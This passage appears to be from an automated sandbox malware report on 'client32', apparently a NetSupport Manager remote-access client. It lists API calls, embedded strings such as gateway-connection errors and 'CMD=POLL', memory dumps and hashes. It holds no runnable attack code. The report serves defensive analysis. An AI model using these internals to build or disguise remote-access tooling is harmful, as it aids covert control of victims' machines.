getsockname.WSOCK32(00000000,?,?), ref: 6859AE4B
LeaveCriticalSection.KERNEL32(685DB898), ref: 6859AE60
GetTickCount.KERNEL32 ref: 6859AE6C
InterlockedExchange.KERNEL32(?,00000000), ref: 6859AE7A

Strings

Connect error to %s using hijacked socket, error %d, xrefs: 6859AB17
*TcpNoDelay, xrefs: 6859ABB8
Cannot connect to gateway %s via web proxy, error %d, xrefs: 6859AD14
Cannot connect to gateway %s, error %d, xrefs: 6859ACA6

Memory Dump Source

Source File: 00000007.00000002.4193643921.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.4193596158.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193696542.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193788365.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$ErrorLast$BlockingHookLeave$Unhookclosesocket$Entergetsockname$CountExchangeInitializeInterlockedTick_memsetbindhtonsinet_ntoasocket
String ID: *TcpNoDelay$Cannot connect to gateway %s via web proxy, error %d$Cannot connect to gateway %s, error %d$Connect error to %s using hijacked socket, error %d
API String ID: 692187944-2561115898
Opcode ID: e5e2543116c1c178c8091a40c7a64bb7115ccdae992da7a805c5cec0014acb38
Instruction ID: 19e6a8f323f29c85e24850b2e4ca5934d0a94c2982567c8896835727aa1d9333
Opcode Fuzzy Hash: e5e2543116c1c178c8091a40c7a64bb7115ccdae992da7a805c5cec0014acb38
Instruction Fuzzy Hash: D5E19375A402149FDF11DF68D890BEDB3B5EF88315F8041AAED19A7280DB709E84CFA5

Function 685991F0 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 97sleepnetworkCOMMON

Download Yara Rule

APIs

#16.WSOCK32(00000000,?,a3Zh,00000000,00000000,?,00000007), ref: 6859924C
WSAGetLastError.WSOCK32(00000000,?,a3Zh,00000000,00000000,?,00000007), ref: 6859925B
GetTickCount.KERNEL32 ref: 68599274
Sleep.KERNEL32(00000001,00000000,?,a3Zh,00000000,00000000,?,00000007), ref: 685992A8
GetTickCount.KERNEL32 ref: 685992B0
Sleep.KERNEL32(00000014), ref: 685992BC

Strings

ReadSocket - Connection has been closed by peer, xrefs: 685992E0
ReadSocket - Error %d reading response, xrefs: 685992F7
hbuf->buflen - hbuf->datalen >= min_bytes_to_read, xrefs: 6859922B
a3Zh, xrefs: 68599244
e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 68599226
ReadSocket - Would block, xrefs: 6859928A
*RecvTimeout, xrefs: 6859927B

Memory Dump Source

Source File: 00000007.00000002.4193643921.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.4193596158.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193696542.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193788365.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CountSleepTick$ErrorLast
String ID: *RecvTimeout$ReadSocket - Connection has been closed by peer$ReadSocket - Error %d reading response$ReadSocket - Would block$a3Zh$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$hbuf->buflen - hbuf->datalen >= min_bytes_to_read
API String ID: 2495545493-1096684884
Opcode ID: b5925360083a57d19c58249876366d12ba0b5fca48a5ea9abd192e68da549f5a
Instruction ID: edc879204cff4bdf9013b3b646520309aa2927875271b2d62d72d76eb8c5f498
Opcode Fuzzy Hash: b5925360083a57d19c58249876366d12ba0b5fca48a5ea9abd192e68da549f5a
Instruction Fuzzy Hash: 2031A23AE80248EFDF10DFBCE988B9EB7F4EB85315F8044A9E908D7140E73199508B91

Function 685A3130 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 178timethreadCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,?,?,97A2354D,6A918BCB,97A234B3,FFFFFFFF,00000000), ref: 685A31E2
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,685CECB0), ref: 685A31EC
GetSystemTime.KERNEL32(?,6A918BCB,97A234B3,FFFFFFFF,00000000), ref: 685A322A
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,685CECB0), ref: 685A3234
EnterCriticalSection.KERNEL32(685DB898,?,97A2354D), ref: 685A32BE
LeaveCriticalSection.KERNEL32(685DB898,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 685A32D3
GetCurrentThreadId.KERNEL32 ref: 685A334D

Part of subcall function 685ABA20: __strdup.LIBCMT ref: 685ABA3A

Part of subcall function 685ABB00: _free.LIBCMT ref: 685ABB2D

Strings

CMD=POLL, xrefs: 685A32F4
1.1, xrefs: 685A3240, 685A324A
ACK=1, xrefs: 685A3312
INFO=1, xrefs: 685A3304

Memory Dump Source

Source File: 00000007.00000002.4193643921.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.4193596158.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193696542.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193788365.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: Time$System$CriticalFileSection$CurrentEnterLeaveThread__strdup_free
String ID: 1.1$ACK=1$CMD=POLL$INFO=1
API String ID: 1510130979-3441452530
Opcode ID: 45c4023052b712fd4c58dc05647e5a7416511ec50250fa07931a60422d5bb665
Instruction ID: 49227012a016f7c2ab4a82d9b13a2c96863fc9b37b58f8714e9526c00b33a5b1
Opcode Fuzzy Hash: 45c4023052b712fd4c58dc05647e5a7416511ec50250fa07931a60422d5bb665
Instruction Fuzzy Hash: B4614176904208EFCF14DFA4D884EEEB7B9FF49314F84451EE816A7240EB34A944CBA5

Function 11095C90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 58comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 11095CA4
CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,11134B2B), ref: 11095CBE
CoCreateInstance.OLE32(?,00000000,00000001,111BBFCC,?,?,?,?,?,?,?,11134B2B), ref: 11095CDB
CoUninitialize.OLE32(?,?,?,?,?,?,11134B2B), ref: 11095CF9

Strings

ICF Present: , xrefs: 11095D00
HNetCfg.FwMgr, xrefs: 11095CB9

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateFromInitializeInstanceProgUninitialize
String ID: HNetCfg.FwMgr$ICF Present:
API String ID: 3222248624-258972079
Opcode ID: a191ec028fc1ebe43799a3fbc6b5824768ffae445ee9dba88daea3a8dfe179cf
Instruction ID: 667ad4978e11a958ff0dee1adaae51f217c5ac115a2c6bb433f56a1af31716a4
Opcode Fuzzy Hash: a191ec028fc1ebe43799a3fbc6b5824768ffae445ee9dba88daea3a8dfe179cf
Instruction Fuzzy Hash: E011C2B0F0112D5FDB01DBE68C94AAFFB69AF04704F108569EA09D7244E722EE40C7E2

Function 11072460 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 314COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 11072590
_memset.LIBCMT ref: 11072709

Strings

NBCTL32.DLL, xrefs: 11072645
_License, xrefs: 11072551
serial_no, xrefs: 1107254C

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memset
String ID: NBCTL32.DLL$_License$serial_no
API String ID: 2102423945-35127696
Opcode ID: 73eab7b1c8d7b6e70f1aa5dd4ab6e6844c03489425f04d6019e1d2487717588b
Instruction ID: d0e0b9ecbde65a2366102896099e84d523940e720fd040d90542ba2888ebc4af
Opcode Fuzzy Hash: 73eab7b1c8d7b6e70f1aa5dd4ab6e6844c03489425f04d6019e1d2487717588b
Instruction Fuzzy Hash: CAB1A075E00219AFEB04CF98DC91FAEB7F5FF88304F148169E9599B295DB70A901CB90

Function 11030B10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 40COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(1102DF30,?,00000000), ref: 11030B34

Strings

Client32, xrefs: 11030B14
NSMWClass, xrefs: 11030B53
NSMWClass, xrefs: 11030B3F

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID: Client32$NSMWClass$NSMWClass
API String ID: 3192549508-611217420
Opcode ID: 58515847b78de4ae681c1499d6e223a9096c2b5aadf525ec481539d2362be3c4
Instruction ID: 7da52f349ca3cb7d8c11f8ab613c71e219a3e37bd0be996a8dda4c31b38bef83
Opcode Fuzzy Hash: 58515847b78de4ae681c1499d6e223a9096c2b5aadf525ec481539d2362be3c4
Instruction Fuzzy Hash: 9901D674E0132EDFD346DFE4C8859AAFBB5EB8571CB148479D82887308FA71A904CB91

Function 1109DC20 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,74DEF550,?,00000000), ref: 1109DC58
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109DC74
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,0047F768,0047F768,0047F768,0047F768,0047F768,0047F768,0047F768,111EAB1C,?,00000001,00000001), ref: 1109DCA0
EqualSid.ADVAPI32(?,0047F768,?,00000001,00000001), ref: 1109DCB3

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InformationToken$AllocateEqualInitialize
String ID:
API String ID: 1878589025-0
Opcode ID: e1ef01c0b2a593c632c16c9fc194400e1d79a88dd1ec3329169a1e99986687c3
Instruction ID: 4e420e32a86b216a8c4820a584475d55105e440134d2483d273bcb85c3c049ac
Opcode Fuzzy Hash: e1ef01c0b2a593c632c16c9fc194400e1d79a88dd1ec3329169a1e99986687c3
Instruction Fuzzy Hash: A1214F71B4122EAFEB00DBA5DC91FBFF7B9EF44744F004069E915D7280E6B1A9018791

Function 1109C750 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(000F01FF,?,1102FAC3,00000000,00000000,00080000,CF3D35D0,00080000,00000000,00000000), ref: 1109C77D
OpenProcessToken.ADVAPI32(00000000), ref: 1109C784
LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109C795
AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109C7B9

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 2349140579-0
Opcode ID: fed7014fb2c6176395dd00bdbf9b6dacad7388df0a8d1a1889bfa0ec87585418
Instruction ID: 79ef21a039d637d1c16a726e2430049afe469fda3395ab205b54f21d4569a753
Opcode Fuzzy Hash: fed7014fb2c6176395dd00bdbf9b6dacad7388df0a8d1a1889bfa0ec87585418
Instruction Fuzzy Hash: 7B014071600219AFD710DF94CC89BAEF7BCEB44705F108469EA05D7240D7B06904CB61

Function 1109C7E0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109DB20,00000244,cant create events), ref: 1109C7FC
CloseHandle.KERNEL32(?,00000000,1109DB20,00000244,cant create events), ref: 1109C805

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 07b6c080e2ef9d1b524653a43e28c47792f2e6050ec9e1d6ef6176c43a5e0348
Instruction ID: 2330733e60bf6a127bb8479b673e73a50ba3166191bfb56ce9f8e109ae2e049c
Opcode Fuzzy Hash: 07b6c080e2ef9d1b524653a43e28c47792f2e6050ec9e1d6ef6176c43a5e0348
Instruction Fuzzy Hash: 09E0EC71A00611ABE738CE249D95FA777ECAF08B11F21496DF956E6180CAA0E8448B64

Function 1102E15E Relevance: 209.8, APIs: 31, Strings: 88, Instructions: 1502COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00002000), ref: 1102E234
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102E266

Strings

WPh, xrefs: 1102E325
Error. Wrong hardware. Terminating, xrefs: 1102E759
LSPloaded=%d, WFPloaded=%d, xrefs: 1102EA2A
WRh, xrefs: 1102E349
\, xrefs: 1102E2BF
UseIPC, xrefs: 1102FA2C
u.j, xrefs: 1102EE2F
pcicl32, xrefs: 1102E3C4
V12.00.4, xrefs: 1102F3EC
*StartupDelay, xrefs: 1102F48B
|#j, xrefs: 1102EE9F
DisableAudioFilter, xrefs: 1102EB09, 1102EEE1
DisableHelp, xrefs: 1102ED94
TraceIPC, xrefs: 1102FA5F
UseNTSecurity, xrefs: 1102F91A
Error. Could not load transports - perhaps another client is running, xrefs: 1102F6C3
Intel error "%s", xrefs: 1102E7B8
DisableJoinClass, xrefs: 1102EC4E, 1102ECEC
Info. Trying to close client, xrefs: 1102E4A4
NSMWClass, xrefs: 1102E1F6, 1102E3D7, 1102E4E4, 1102F9EF
ShowKBEnable, xrefs: 1102EC19
Global\NSMWClassAdmin, xrefs: 1102F9FA
Windows XP Ding.wav, xrefs: 1102EE48
EnableSmartcardAuth, xrefs: 1102F93B
*BeepSound, xrefs: 1102EE0C
jj, xrefs: 1102F4FE
NoFTWhenLoggedOff, xrefs: 1102ED7C
closed ok, xrefs: 1102E4CE
DisableJournalMenu, xrefs: 1102ECAE, 1102ED4C
gClient.hNotifyEvent, xrefs: 1102E27F
_debug, xrefs: 1102E85D, 1102E9B6, 1102FA64
DisableJournal, xrefs: 1102EC96, 1102ED34
client32, xrefs: 1102E655, 1102E7F2
EnableSmartcardLogon, xrefs: 1102F8FF
DisableTSAdmin, xrefs: 1102EAB8
IsILS returned %d, isvistaservice %d, xrefs: 1102E72A
Windows 95, xrefs: 1102EF29
istaUI, xrefs: 1102E166
NSTWControl32, xrefs: 1102FBAA
Audio, xrefs: 1102EB0E, 1102EEE6
Error x%x reading nsm.lic, sesh=%d, xrefs: 1102E5D6
AlwaysOnTop, xrefs: 1102F7EF
|, xrefs: 1102E2DF
609290, xrefs: 1102F5ED, 1102F687, 1102F764
WRh, xrefs: 1102E2F4
*ScreenScrape, xrefs: 1102F531, 1102F57A, 1102F7AC
Default, xrefs: 1102FB4B, 1102FB7A, 1102FBA3
NSMWClassVista, xrefs: 1102E1E5
DisableAudio, xrefs: 1102EAD0, 1102EAF1, 1102EB5F, 1102ECC6, 1102ED64
DisableRequestHelp, xrefs: 1102EC7E, 1102ED1C
Ready, xrefs: 1102FBC1
Client, xrefs: 1102E539, 1102EA48, 1102EAD5, 1102EAF6, 1102EB64, 1102EB7C, 1102EB94, 1102EBBE, 1102EBE8, 1102EC1E, 1102EC53, 1102EC6B, 1102EC83, 1102EC9B, 1102ECB3, 1102ECCB, 1102ECF1, 1102ED09, 1102ED21, 1102ED39, 1102ED51, 1102ED69, 1102ED81, 1102ED99, 1102EEAA, 1102F490, 1102F536, 1102F57F, 1102F75A, 1102F7B1, 1102F7CD, 1102F7F4, 1102F904, 1102F91F, 1102F940, 1102FA31
hClientRunning = %x, pid=%d (x%x), xrefs: 1102E51A
Bridge, xrefs: 1102E52D
EnableGradientCaptions, xrefs: 1102E940, 1102E957, 1102E978
View, xrefs: 1102E545, 1102E945, 1102E95C, 1102E97D
*ListenPort, xrefs: 1102FAFE
UseLegacyPrintCapture, xrefs: 1102EEA5
t&h, xrefs: 1102E22D
win8ui, xrefs: 1102E858
NSA.LIC, xrefs: 1102E57B, 1102E582, 1102E5A5
NSMWControl32, xrefs: 1102FB52
RestartAfterError, xrefs: 1102EA6A
TracePriv, xrefs: 1102F469
NeedsReinstall, xrefs: 1102EA43
*BeepUsingSpeaker, xrefs: 1102EDD9
General, xrefs: 1102E998, 1102EA6F, 1102EDDE, 1102EE11
Windows Ding.wav, xrefs: 1102EE41
Info. Client running as user=%s, type=%d, xrefs: 1102E492
jjjj, xrefs: 1102F80A
s, xrefs: 1102E3A8
AssertTimeout, xrefs: 1102E993
RWh, xrefs: 1102E452
NSSWControl32, xrefs: 1102FB81
*PriorityClass, xrefs: 1102F7C8
jj, xrefs: 1102F4E2
CLIENT32.CPP, xrefs: 1102E27A, 1102E80B
ScreenScrape, xrefs: 1102EB8F, 1102EBB9, 1102EBE3
V12.10.4, xrefs: 1102F3F3, 1102F427
DisableConsoleClient, xrefs: 1102EAA0, 1102EB35
DisableRunplugin, xrefs: 1102EB77
Session shutting down, exiting..., xrefs: 1102E23E
TCPIP, xrefs: 1102FB03
MiniDumpType, xrefs: 1102E9B1
_debug, xrefs: 1102F46E
DisableReplayMenu, xrefs: 1102EC66, 1102ED04
Info. Client already running, pid=%d (x%x), xrefs: 1102E43F
NSM.LIC, xrefs: 1102E56D, 1102E60B

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
